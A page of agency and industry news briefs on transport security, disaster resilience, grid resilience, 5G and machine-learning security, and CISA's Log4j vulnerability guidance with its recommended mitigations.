TSA leaders share tips to get through airport security during the pandemic

Agency News, Industry News, Transport sector

There are a handful of actions that travelers can take in an effort to get through Transportation Security Administration (TSA) airport checkpoints during the pandemic in ways that may help reduce the likelihood of contracting COVID-19.

While security is TSA’s top priority, the health and safety of TSA employees and the traveling public is of utmost importance. TSA remains in close communication with medical professionals, the CDC, and various government agencies as we continue to carry out its security mission during the pandemic.

Here are a few suggestions that TSA Federal Security Directors want to share with travelers who are scheduled to fly during the pandemic.

  • John Bambury, TSA Federal Security Director for John F. Kennedy International Airport: “You’ve heard it a thousand times—wear a mask. I wear a mask every single day at the airport, which is one of the top recommendations from the CDC. If you’re flying, you should also consider carrying an extra mask so that if the elastic band snaps on your mask, you’ve got a spare one handy. Also, you may want to change into a fresh mask upon arrival at your destination. If you don’t have a mask, the TSA officer at the travel document checking podium will offer you one for free. When you get to the travel document podium, the TSA officer will ask you to remove your mask for just a few seconds to verify that your face matches the ID that you are presenting.”
  • Scott T. Johnson, TSA Federal Security Director for Washington Dulles International and Ronald Reagan Washington National Airports: “Consider enrolling in TSA PreCheck® because it gets you through the checkpoint conveniently and more quickly than a standard checkpoint lane, making it even more valuable in today’s travel climate. TSA PreCheck passengers spend less time waiting in line and keep their shoes, belts and jackets on during screening and electronics in their carry-ons, reducing overall contact during screening. Travelers in the program also are permitted to leave their 3-1-1 liquids bag in their carry-on bags.”
  • Gerardo Spero, TSA Federal Security Director for Philadelphia International Airport: “Know before you go. By that I mean that you need to know what is in your carry-on bag before you head to the airport to ensure that you have nothing prohibited with you. Prohibited items such as large liquids, knives, pepper spray, loose ammunition, and other prohibited items result in our need to open your carry-on bag and remove them. This keeps you in the checkpoint for an extra few minutes while one of our TSA officers opens your carry-on to search and eventually remove the item. We want to get you through the security checkpoint efficiently and quickly. Prohibited items slow you down.”
  • Thomas Carter, TSA Federal Security Director for Newark Liberty International Airport: “The CDC recommends washing your hands frequently. Consider washing your hands before and after completing the security screening process. If it is not possible to wash your hands, please use hand sanitizer. TSA has instituted a temporary exemption from the 3-1-1 rule, that permits travelers to carry up to one 12-ounce container of liquid hand sanitizer per passenger, in carry-on bags. You can also bring individual hand wipes or a large tub of hand wipes with you to help wipe down your hands and even handles of your carry-on bags.”
  • John C. Allen, TSA Federal Security Director for Yeager Airport: “Do your best to socially distance from others whenever possible. By that I mean, leave some extra space between the traveler in line ahead of you. Take that an extra step back. After you go through the checkpoint scanner, that’s another opportunity to take an extra step back while you wait for your carry-on items along the conveyor belt. Look around, see where you can wait for your carry-on items a little farther away from fellow passengers. Then take your belongings off to the side to put on your shoes, jacket and other items so that you’ve got some extra space of your own to recompose.”
  • Grant Goodlett, TSA Federal Security director for Baltimore/Washington International-Thurgood Marshall Airport: “If you haven’t traveled in a while, you will notice that TSA has installed acrylic shields in checkpoints in an effort to make the screening process safer for passengers and our workforce by reducing the potential of exposure to the coronavirus. Please don’t walk around these acrylic shields to interact with our TSA officers. The shields have small vents to allow for conversation, questions and answers to be shared.”

[Source: TSA]

Leave a comment , ,

How Parliamentarians can L.A.B.O.R. for disaster resilience

Agency News, Industry News, University/Research/Academia sector

While hazards may be natural, disasters are not. The choices we make can either increase or decrease risk. As the planet slowly warms, parliamentarians can help. Indeed, they can L.A.B.O.R. for resilience.

The global pandemic caused by Covid-19 has been a wake-up call for the whole world. Appalling losses of life, economic devastation and ripples of insecurity have touched every corner of the planet. No one has been immune and the power (or lack thereof) of the state to prevent, prepare and respond has been severely tested. While there’s no way to guess how the pandemic would have unfolded had the world been more prepared, research repeatedly shows that disaster risk reduction and preparedness mitigate losses by large margins. Just 24 hours warning of a coming storm or heat wave can cut the ensuing damage by 30 percent.

As public tolerance for risk is decreasing; citizens around the world are increasingly exposed to growing and compounded risks, with losses now reaching between $250 and $300 billion annually, up from about $50 billion in the 1980s. Climate change interacts with other hazards - technological, biological, chemical and geopolitical, among others – which creates greater risk complexity. The impacts of disaster know no bounds, but those living in more vulnerable circumstances tend to be the hardest hit, with poorer countries registering the highest post-disaster mortality rates.

While hazards may be natural, disasters are not

Flood, earthquakes, landslides or storms become disasters because of the exposure and vulnerability of people and places. The choices we make can either increase or decrease risk. Therefore, each stakeholder has a role in reducing disaster risk. Parliamentarians are uniquely situated to help societies weather all kind of disasters with more resilience and preparation. Last year, the United Nations Office for Disaster Risk Reduction (UNDRR) and the Inter-Parliamentary Union (IPU) launched a toolkit for parliamentarians detailing how they can help build resilience for their communities. The guidance features ten recommendations grouped into five categories: Legislate; Advocate; Budget; Oversee; Represent (L.A.B.O.R.).

Read below for a snapshot of how parliamentarians can L.A.B.O.R. for their constituency’s resilience.

Legislate
Creating legislation is one of parliamentarians’ key jobs. In this regard, using risk and vulnerability assessments, they can create both DRR (disaster risk reduction) legislation, as well as amend existing legislation to reflect and support international DRR commitments.

Advocate
Parliamentarians can advocate for governments to shift from their current event-centered, response and recovery approach to DRR to a multi-hazard approach that considers vulnerability. They can also advocate for the use of data, expertise and experience from national and international institutions, as well as from other countries, to inform their own DRR frameworks and strategies. Finally, parliamentarians can advocate for DRR to be integrated into climate change plans and initiatives.

Budget (and finance)
Determining budget allocation is another vital task for parliamentarians and here they can focus on funding long-term DRR initiatives – including allocating funds for the oversight of data collection, reporting purposes and regulation enforcement – at all levels of government. Parliamentarians can also integrate and mainstream DRR into public and private investment decisions, ensuring that investments are risk-informed.

Oversee
Accountability is an important aspect of any government investment decision. Parliamentarians can use their oversight role to evaluate government performance, effectiveness and spending for DRR initiatives, thus demonstrating their effectiveness. They can also make people aware of the impacts of regulation, enforcement and penalties. In order to support ease of use and to compare different initiatives, parliamentarians can ensure information is provided in standardized, consistent formats.

Represent
Finally, as elected officials, parliamentarians are responsible for representing all of their constituents and ensuring that DRR policies and plans meet their specific needs. This all-of-society approach must include those most vulnerable in disasters: the poor, women, girls, ethnic minorities and persons with disabilities. Parliaments can ensure that DRR strategies and commitments are durable and will survive electoral changes by using a non-partisan, holistic approach to developing DRR plans.

Using the L.A.B.O.R. framework, parliamentarians can help create disaster-ready communities, both saving lives and protecting economic resources.

[Source: UNDRR]

Leave a comment , ,

Balance of Power - Building a Resilient Electric Grid

Agency News, Industry News, Power/Energy/Oil & Gas sector

In early September, Hurricane Ida caused a massive blackout, leaving New Orleans in the dark for more than two days. A month before Ida, Tropical Storm Henri cut power to 100,000 households in Rhode Island. The wildfires in the western United States are common sources of blackouts in California. And earlier this year in Central Texas, harsh winter conditions led to a breakdown of the state’s electric grid, leaving one million people without heat and electricity for days.

These types of events are increasing in frequency as the nation’s infrastructure ages and climate change leads to extreme weather events. Hotter, wetter summers and harsher winters require more reliance on heating and cooling utilities, placing higher stress on the nation’s electric grid. For nearly a decade and a half, the Science and Technology Directorate (S&T) has teamed up with industry and one of the nation’s largest (and windiest) cities to study how technology can ‘help keep the lights on’ during emergencies. This fall, S&T and its partners announced the fruits of this labor: the successful installation and operation of the Resilient Electric Grid (REG) system in Chicago.

How the Electric Grid Works

This is a simplified arrangement of the grid system in the U.S. At the Generation step, electricity is generated at various kinds of power plants by utilities and independent power producers. The plant has lines leading to a transmission substation. The next step is Transmission where electric transmission is the vital link between power production and power usage. There are transmission lines from the generating plant that carry electricity at high voltages over long distances from power plants to communities. These lines lead to a Substation. At the bottom of the image are three light gray buildings with yellow windows, and the bottom right of the image are tall dark gray buildings. Lines from the substation lead to these buildings to represent the Distribution step, where electricity from transmission lines is reduced to lower voltages at substations, and distribution companies then bring the power to your home and workplace. Power lines lead from the Substation to another Substation to the right of the image. Lines from this substation lead to a farm and four houses.The electric grid is a complex network that spans the creation of electricity at a power generation station to the delivery of electricity to the end user. To get from the generation site to the end user, often several (possibly hundreds of) miles away, electricity travels through the transmission system, which converts the very high voltage electricity generated by the power plant to lower voltages. The electricity is further stepped down in voltage through the distribution network as it gets closer to homes, business, and other facilities. Major urban communities have multiple distribution level substations throughout the city to meet the electrical power needs of its population.

Ideally, these distribution substations would be interconnected, so if one substation fails for any reason, another can step in and provide electricity—like driving on system of highways, streets, and roads where you have multiple routes that can get you to the same destination. In reality, however, distribution substations are not interconnected. This is a designed safety feature in the grid so that an issue at one substation, such as a fault current (a large spike in electric current) doesn’t cascade down through the system and impact other substations.

As a result of this set up, if a substation fails, the area that that substation serves experiences a blackout. But what if we could prevent the risk associated with connecting substations so that in the event of a substation failure, other substations could step in and “help” continue to deliver power, creating multiple paths for power to flow just like how traffic flows on the internet?
S&T Powered (and Empowered) a Solution

Finding a solution to increase grid resilience inspired S&T to launch its REG project back in 2007. The project built on the Department of Energy’s (DOE) previous research on High Temperature Superconducting (HTS) cables.

S&T’s Sarah Mahmood, an electrical engineer, led the S&T project team in collaboration with American Superconductor (AMSC), a leading system provider of megawatt-scale power resiliency solutions.

Together, the team developed REG systems featuring cable systems that utilize AMSC’s proprietary Amperium® HTS technology designed to suppress surges while providing the ability to connect substations without risking a cascading fault current.

“Substations are usually not connected because of the risk of fault currents. It’s like a surge. In your house, you use a surge protector. If you don’t have protection against fault currents, you risk damaging the equipment downstream. But because they’re not connected, they lack resiliency,” Mahmood explained.

How a Superconductor Works

HTS cables use liquid nitrogen to keep the cable cool enough to function in a superconducting state. If the HTS cable experiences a fault, the fault creates energy which heats up the system so that it is no longer in a superconducting state, essentially turning itself off automatically, like a switch, preventing equipment damage. What’s more, because HTS cables are superconducting there is very little resistance or loss of power over the length of the cable making them more efficient compared to traditional power cables, which experience a loss of power over distance.

After years of research, development and lab testing to prove the concept of a fault current limiting high temperature superconducting cable, S&T and AMSC partnered with Commonwealth Edison (ComEd), the largest electric utility in Illinois serving over four-million customers, to integrate the technology in the grid.

“S&T is grateful for the partnership with ComEd enabling us to install the REG system in the grid as a permanent asset, hopefully setting a pathway for broader market adoption of this new capability by industry as a potential solution to increase grid resilience,” Mahmood explained.

“The successful integration of the REG system is a major milestone in our efforts to enhance our service to customers through innovation,” said Terence R. Donnelly, President and COO of ComEd. “The increasingly frequent and severe weather events associated with climate change and the need for enhanced cyber and physical security require grid investments that will sustain the high levels of safe and reliable power that our customers depend on.”

HTS Technology Brings Resiliency to Power Grid Operations

A stable homeland is dependent on the reliable delivery of electricity—from public health to the economy and national security. According to DOE's Grid Modernization and the Smart Grid project, there are more than 9,200 electric generating units with more than 1 million megawatts of generating capacity feeding more than 600,000 miles of transmission lines that comprise the U.S. electric grid.

“Our superconductor-based REG system improved the reliability and resiliency of the grid, reducing disruption to public infrastructure and saving money for utility customers—all in an environmentally-friendly manner,” said Daniel P. McGahn, Chairman, President & CEO, AMSC. “We believe this accomplishment opens opportunities for AMSC to deploy REG systems to other innovative utilities.”

On September 30, DHS and DOE participated in a ribbon-cutting in Chicago to highlight the REG system installation into the ComEd grid. ComEd is the first utility in the United States to permanently install the AMSC REG system into the grid and will evaluate connecting it to multiple substations in order to create a back-up system for continuous power delivery even with a disruption to the power grid.

“S&T will continue to monitor the REG system’s performance with hopes for future commercialization, as other utilities look to increase grid resiliency,” said Mahmood.

According to a DOE study, the United States loses nearly $70 billion each year from power outages. S&T’s continued research and development efforts aim to enhance the nation’s overall energy resilience, so future generations can keep the lights on.

[Article source: DHS S&T]

Leave a comment , , , , ,

Artificial Intelligence: How to make Machine Learning Cyber Secure

Agency News, Cyber Security CII sector, Industry News

Machine learning (ML) is currently the most developed and the most promising subfield of artificial intelligence for industrial and government infrastructures. By providing new opportunities to solve decision-making problems intelligently and automatically, artificial intelligence (AI) is applied in almost all sectors of our economy.

While the benefits of AI are significant and undeniable, the development of AI also induces new threats and challenges, identified in the ENISA AI Threat Landscape.

How to prevent machine learning cyberattacks? How to deploy controls without hampering performance? The European Union Agency for Cybersecurity answers the cybersecurity questions of machine learning in a new report recently published.

Machine learning algorithms are used to give machines the ability to learn from data in order to solve tasks without being explicitly programmed to do so. However, such algorithms need extremely large volumes of data to learn. And because they do, they can also be subjected to specific cyber threats.

The Securing Machine Learning Algorithms report presents a taxonomy of ML techniques and core functionalities. The report also includes a mapping of the threats targeting ML techniques and the vulnerabilities of ML algorithms. It provides a list of relevant security controls recommended to enhance cybersecurity in systems relying on ML techniques. One of the challenges highlighted is how to select the security controls to apply without jeopardising the expected level of performance.

The mitigation controls for ML specific attacks outlined in the report should in general be deployed during the entire lifecycle of systems and applications making use of ML.

Machine Learning Algorithms Taxonomy

Based on desk research and interviews with the experts of the ENISA AI ad-hoc working group, a total of 40 most commonly used ML algorithms were identified. The taxonomy developed is based on the analysis of such algorithms.

The non-exhaustive taxonomy devised is to support the process of identifying which specific threats target ML algorithms, what are the associated vulnerabilities and the security controls needed to address those vulnerabilities.

The EU Agency for Cybersecurity continues to play a bigger role in the assessment of Artificial Intelligence (AI) by providing key input for future policies. The Agency takes part in the open dialogue with the European Commission and EU institutions on AI cybersecurity and regulatory initiatives to this end.

Leave a comment , , ,

ESF Members, NSA and CISA publish the fourth installment of 5G cybersecurity guidance

Cyber Security CII sector, Industry News

The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) published the fourth installment on securing integrity of 5G cloud infrastructures, Ensure Integrity of Cloud Infrastructure. As 5G networks and devices continue to increase in popularity, the importance of platform security to harden your systems against malicious cyber activity and persistence is apparent.

This guidance has been created by the Critical Infrastructure Partnership Advisory Council (CIPAC) Cross Sector Enduring Security Framework (ESF) Working Group - a public-private working group led by NSA and CISA, that provides cybersecurity guidance addressing high priority threats to the nation’s critical infrastructure.

Ensure Integrity of Cloud Infrastructure provides guidance on platform integrity, build time security, launch time integrity, and micro services infrastructure integrity. An industry trend has been to deploy stand-alone 5G core using virtualized functions of micro services on an architecture that provides rapid enablement of services. It is imperative for device and system security that the underlying 5G cloud infrastructure platform on which micro services are deployed, or orchestrated, have been designed and built securely and continue operating as intended.

"A secure 5G core requires cybersecurity mitigations that are implemented at the foundation level and carried forward," said Jorge Laurel, NSA Project Director for ESF. "A secure underlying foundation ensures the services deployed on the network are done so on a secure infrastructure, which further strengthens the security of data across the network."

“The document provides actionable advice for 5G operators, said Neal Ziring, NSA Cybersecurity Technical Director. “The fourth installment in the series covers an essential topic: integrity. Integrity is the most fundamental security property, and ensuring integrity from base hardware up through the software stack is critical for maintaining trustworthy 5G services.”

“The issues facing the cloud community, such as lateral movement to pod security and infrastructure integrity, are complex as are their solutions,” said Alaina Clark, Assistant Director of Stakeholder Engagement, CISA. “This series demonstrates the value of collaboration, spotlighting several cyber best practices that cloud providers, mobile network operators, and customers alike can implement for long-term security benefits. With our ESF government and industry associates, CISA will continue working with the Cloud and 5G communities to secure our Nation’s network infrastructure through partnership efforts like this.”

Leave a comment , ,

Maritime Infrastructure: Public Ports Engage in an Extensive Range of Activities beyond Freight Movement

Agency News, Industry News, Transport sector

Coastal, Great Lakes, and inland ports are critical to the U.S. economy. Aside from moving freight, ports across the U.S. have a variety of non-freight activities—like cruise ship and ferry terminals, commercial fishing, recreation, and commercial and residential development. Ports engage in non-freight activities to diversify business, find new uses for underused facilities, and contribute to community development.

Federal grant programs we reviewed provided some support to ports for these activities, with the Department of Transportation providing most funding for freight and non-freight projects.

Public ports across the U.S. pursue an extensive range of activities unrelated to freight movement. Examples of such non-freight activities include cruise ship and ferry terminals, commercial fishing, recreation, and commercial and residential development. In a GAO survey of ports, 67 of the 80 respondents reported being involved in non-freight activities in the last 10 years, with most respondents having a mix of freight and non-freight activities. Port officials said they pursue non-freight activities to diversify lines of business, find new uses for underused facilities, and address unmet community development needs, among other reasons. Non-freight activities can also have economic impacts including creating jobs, according to port stakeholders and economic impact studies. For example, one study estimated that commercial fishing activity at the Port of Seattle accounted for 11,300 jobs and generated $1.4 billion in total business output in 2017. Ports most commonly reported funding their non-freight activities with port revenues (55 survey respondents) or state funds (53 survey respondents).

Federal grant programs GAO reviewed have provided some funding to ports for non-freight projects but have largely focused on freight. According to GAO's analysis of federal grant award data for fiscal years 2010 through 2020, agencies provided at least $141 million to ports for non-freight projects during this time, or about 8 percent of the almost $1.9 billion in total funding these programs awarded to ports, in fiscal year 2020 dollars. The U.S. Department of Transportation (DOT) provided the majority of funding to ports for both freight and non-freight projects. DOT-funded non-freight projects include ferry-, cruise-, and fishing-related projects, among others. Stakeholders reported that ports, especially small ports, face challenges with federal grant programs. For example, stakeholders and federal officials said that many grant programs GAO reviewed are consistently oversubscribed and that smaller ports may lack the resources to develop a competitive application. Stakeholders GAO spoke with differed on the need for additional federal funding for non-freight activities.

The nation's coastal, Great Lakes, and inland ports have long been recognized as critical to the national and local economies. Ports can contribute not only by moving freight but also, for example, through activities related to tourism, transportation, or real estate. Nationwide port studies have typically focused on the impact of freight, and less attention has been paid to these non-freight activities.

House Report 116-452 included a provision for GAO to examine ports' non-freight activities. This GAO report describes (1) what is known about the nature of and funding for non-freight activities at public ports, and (2) the extent to which federal discretionary grant programs have provided funds to public ports for non-freight and freight projects, and stakeholders' views on this federal assistance.

To address the two objectives above, GAO conducted a non-generalizable survey of 80 ports and interviewed officials at 15 ports and 14 port industry stakeholders. GAO selected ports for variety based on their level of non-freight activity, freight traffic, and location, and whether they have applied for DOT funding. GAO also interviewed officials within DOT; the Departments of Commerce (Commerce), Defense, and Homeland Security; and the Environmental Protection Agency (EPA).

Leave a comment , , ,

ESA and PSCE cooperate on Space Applications and Digital Transformation in Public Safety

Agency News, Industry News, Space Sector

The European Space Agency (ESA) and Public Safety Communication Europe (PSCE) are working together to support the emergence of space-based applications in the domain of public safety. Having jointly signed a Memorandum of Intent (MoI), the organisations will join efforts to support the emergence of applications that leverage on secure satellite communications for addressing the needs of blue forces. ESA will launch a funding call early in 2022 to invite companies to develop and demonstrate digital services that are enabled by secure satcom solutions for addressing the urgent needs of public safety operators.

Security in space and on Earth are inextricably linked. The deployment of advanced satellite systems and their safe circulation in space are crucial for resilient and secure connectivity on Earth. As set out in its recently released vision for European space activities, ESA is stepping up its efforts to enable Europe to address new safety and security user needs to make sure that our space programmes continue to be at the service of all citizens through Agenda 2025. ESA's Strategic Programme Line “Space Systems for Safety and Security (4S)” combines both to include applications within disaster preparedness, response and resilience, situational awareness, assessments of damages, navigation-based services for tracking and coordinating rescue forces on-site and for emergency vehicles.

Through its ARTES (Advanced Research in Telecommunications Systems) programme, ESA is forging strong links between institutions, industries, and business to leverage the capabilities of space to drive digital services.

“I’m pleased to be working with PSCE to realise the potential of space to drive commercial solutions for secure satellite communication in public safety. This is a great example on how ESA is promoting the use of space technologies and applications to address safety and security needs expressed by the organisations operating in this domain. This collaboration will pave the way to the ESA Rapid and Resilient Crisis Response (R3) Accelerator,“ says Rita Rinaldo, Head of the Partner-led and Thematic Initiatives Section, ESA Space Solutions.

Leave a comment , , ,

CISA Issue Apache Log4j Vulnerability Guidance

Agency News, Association News, Cyber Security CII sector

CISA and its partners, through the Joint Cyber Defense Collaborative, are responding to active, widespread exploitation of a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam." Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.

Apache released Log4j version 2.15.0 in a security update to address the CVE-2021-44228 vulnerability. However, in order for the vulnerability to be remediated in products and services that use affected versions of Log4j, the maintainers of those products and services must implement this security update. Users of such products and services should refer to the vendors of these products/services for security updates. Given the severity of the vulnerability and the likelihood of an increase in exploitation by sophisticated cyber threat actors, CISA urges vendors and users to take the following actions.

Vendors
Immediately identify, mitigate, and patch affected products using Log4j.
Inform your end users of products that contain this vulnerability and strongly urge them to prioritize software updates.
Affected Organizations
In addition to the immediate actions—to (1) enumerate external-facing devices that have Log4j, (2) ensure your SOC actions alerts on these devices, and (3) install a WAF with rules that automatically update—as noted in the box above, review CISA's upcoming GitHub repository

for a list of affected vendor information and apply software updates as soon as they are available. See Actions for Organizations Running Products with Log4j below for additional guidance. Note: CISA has added CVE-2021-44228 to the Known Exploited Vulnerabilities Catalog, which was created according to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities. In accordance with BOD 22-01, federal civilian executive branch agencies must mitigate CVE-2021-44228 by December 24, 2021.

Technical Details

This RCE vulnerability—affecting Apache’s Log4j library, versions 2.0-beta9 to 2.14.1—exists in the action the Java Naming and Directory Interface (JNDI) takes to resolve variables. According to the CVE-2021-44228 listing, affected versions of Log4j contain JNDI features—such as message lookup substitution—that "do not protect against adversary-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI related endpoints."

An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows the adversary to take full control over the system. The adversary can then steal information, launch ransomware, or conduct other malicious activity.
Actions for Organizations Running Products with Log4j

CISA recommends affected entities:

Review Apache’s Log4j Security Vulnerabilities page for additional information and, if appropriate, apply the provided workaround:
In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
For releases from 2.7 through 2.14.1 all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.
For releases from 2.0-beta9 to 2.7, the only mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Apply available patches immediately. See CISA's upcoming GitHub repository for known affected products and patch information.

Prioritize patching, starting with mission critical systems, internet-facing systems, and networked servers. Then prioritize patching other affected information technology and operational technology assets.
Until patches are applied, set log4j2.formatMsgNoLookups to true by adding -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for starting your application. Note: this may impact the behavior of a system’s logging if it relies on Lookups for message formatting. Additionally, this mitigation will only work for versions 2.10 and above.
As stated above, BOD 22-01 directs federal civilian agencies to mitigate CVE-2021-44228 by December 24, 2021, as part of the Known Exploited Vulnerabilities Catalog.

Conduct a security review to determine if there is a security concern or compromise. The log files for any services using affected Log4j versions will contain user-controlled strings.
Consider reporting compromises immediately to CISA and the FBI.
.

Leave a comment , , ,

DHS Announces New Cybersecurity Requirements for Surface Transportation Owners and Operators

Agency News, Cyber Security CII sector, Industry News

DHS’s Transportation Security Administration (TSA) has announced two new Security Directives and additional guidance for voluntary measures to strengthen cybersecurity across the transportation sector in response to the ongoing cybersecurity threat to surface transportation systems and associated infrastructure. These actions are among several steps DHS is taking to increase the cybersecurity of U.S. critical infrastructure.

“These new cybersecurity requirements and recommendations will help keep the traveling public safe and protect our critical infrastructure from evolving threats,” said Secretary of Homeland Security Alejandro N. Mayorkas. “DHS will continue working with our partners across every level of government and in the private sector to increase the resilience of our critical infrastructure nationwide.”

TSA is increasing the cybersecurity of the transportation sector through Security Directives, appropriately tailored regulations, and voluntary engagement with key stakeholders. In developing its approach, including these new Security Directives, TSA sought input from industry stakeholders and federal partners, including the Department’s Cybersecurity and Infrastructure Security Agency (CISA), which provided expert guidance on cybersecurity threats to the transportation network and countermeasures to defend against them.

The TSA Security Directives announced today target higher-risk freight railroads, passenger rail, and rail transit, based on a determination that these requirements need to be issued immediately to protect transportation security. These Directives require owners and operators to:

- designate a cybersecurity coordinator;
- report cybersecurity incidents to CISA within 24 hours;
- develop and implement a cybersecurity incident response plan to reduce the risk of an operational disruption; and,
- complete a cybersecurity vulnerability assessment to identify potential gaps or vulnerabilities in their systems.

TSA is also releasing guidance recommending that all other lower-risk surface transportation owners and operators voluntarily implement the same measures. Further, TSA recently updated its aviation security programs to require that airport and airline operators implement the first two provisions above. TSA intends to expand the requirements for the aviation sector and issue guidance to smaller operators. TSA also expects to initiate a rule-making process for certain surface transportation entities to increase their cybersecurity resiliency.

These efforts are part of a series of new steps to prioritize cybersecurity across DHS. Secretary Mayorkas first outlined his vision for the Department’s cybersecurity priorities in March, which included a series of focused 60-day sprints designed to elevate existing work, remove roadblocks to progress, and launch new initiatives and partnerships to achieve DHS’s cybersecurity mission and implement Biden-Harris Administration priorities. To learn more about the sprints, please visit www.dhs.gov/cybersecurity.

Leave a comment , , ,

GAO Report: Cybersecurity - Federal Actions Urgently Needed to Better Protect the Nation's Critical Infrastructure

Agency News, Cyber Security CII sector, Industry News

Recent events—including the ransomware attack on a major U.S. fuel pipeline—illustrate the need to strengthen the cybersecurity of the nation's critical infrastructure.

We testified on the need for the federal government to develop and execute a comprehensive national cyber strategy, and to strengthen the role that it plays in protecting the cybersecurity of critical infrastructure. Ensuring the cybersecurity of the nation is on our High Risk List, and we have urged federal agencies to act on it.

If the federal government doesn't act with greater urgency, the security of our nation's critical infrastructure will be in jeopardy.

GAO has previously reported on major cybersecurity challenges facing the nation and the critical federal actions needed to address them (see figure).

Four Major Cybersecurity Challenges and 10 Associated Critical Actions

To address critical infrastructure cybersecurity, key actions the federal government needs to take include (1) developing and executing a comprehensive national cyber strategy and (2) strengthening the federal role in protecting the cybersecurity of critical infrastructure.

Develop and execute a comprehensive national cyber strategy. In September 2020, GAO reported that the White House's 2018 National Cyber Strategy and related implementation plan addressed some, but not all, of the desirable characteristics of national strategies, such as goals and resources. GAO also reported that it was unclear which official within the executive branch ultimately maintained responsibility for coordinating the execution of the National Cyber Strategy. Accordingly, GAO recommended that the National Security Council update the cybersecurity strategy and for Congress to consider legislation to designate a position in the White House to lead such an effort.

In January 2021, a federal statute established the Office of the National Cyber Director within the Executive Office of the President. In June 2021, the Senate confirmed a Director to lead this new office. In October 2021, the National Cyber Director issued a strategic intent statement, outlining a vision for the Director's planned high-level lines of efforts. The establishment of a National Cyber Director is an important step toward positioning the federal government to better direct activities to address the nation's cyber threats. Nevertheless, GAO's recommendation to develop and execute a comprehensive national cyber strategy is not yet fully implemented. As a result, a pressing need remains to provide a clear roadmap for addressing the cyber challenges facing the nation, including its critical infrastructure.

Strengthen the federal role in protecting the cybersecurity of critical infrastructure. Pursuant to legislation enacted in 2018, the Cybersecurity and Infrastructure Security Agency (CISA) within the Department of Homeland Security (DHS) was charged with responsibility for, among other things, enhancing the security of the nation's critical infrastructure in the face of both physical and cyber threats. In March 2021, GAO reported that DHS needed to complete key activities related to the transformation of CISA, including finalizing the agency's mission-essential functions and completing workforce planning activities. GAO also reported that DHS needed to address challenges identified by selected critical infrastructure stakeholders, including having consistent stakeholder involvement in the development of related guidance (see figure). Accordingly, GAO made 11 recommendations to DHS. As of November 2021, DHS had not yet implemented them, though it stated its intent to do so.

Cybersecurity and Infrastructure Security Agency (CISA) Coordination Challenges Reported by Stakeholders Representing the 16 Critical Infrastructure Sectors

Regarding specific critical infrastructure sectors, since 2010 GAO has made about 80 recommendations to enhance the cybersecurity of these sectors and subsectors, including within the aviation and pipeline industries. In October 2020, GAO reported that, although the Federal Aviation Administration had established a process for certification and oversight of U.S. commercial airplanes, it had not prioritized risk-based cybersecurity oversight or included periodic testing as part of its monitoring process, among other things. In July 2021, GAO testified that the Transportation Security Administration had not fully addressed pipeline cybersecurity-related weaknesses that GAO had previously identified, such as aged protocols for responding to pipeline security incidents. Until GAO's recommendations to address issues such as these are fully implemented, federal agencies will not be effectively positioned to ensure critical infrastructure sectors are adequately protected from potentially harmful cybersecurity threats.

Leave a comment
1 25 26 27 28 29 60